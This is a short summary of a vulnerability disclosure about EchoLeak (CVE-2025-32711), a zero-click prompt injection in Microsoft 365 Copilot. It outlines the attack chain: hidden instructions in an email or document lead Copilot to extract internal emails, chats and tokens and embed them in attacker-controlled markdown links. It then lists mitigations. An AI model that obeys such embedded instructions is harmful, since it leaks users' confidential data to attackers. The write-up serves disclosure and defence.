Echoleak- Send a prompt , extract secret from Copilot AI!( CVE-2025-32711)

EchoLeak is a documented zero-click prompt-injection vulnerability in Microsoft 365 Copilot where a crafted email or document causes Copilot to process hidden instructions, extract sensitive internal context (emails, chats, documents, tokens), and embed that data into attacker-controlled markdown links that trigger exfiltration. The report outlines the attack chain, demonstrates how automatic rendering and lack of prompt isolation enable the leak, and recommends mitigations including prompt isolation, input sanitization, disabling auto-rendering of untrusted content, restricting AI context access, monitoring AI output, and user training.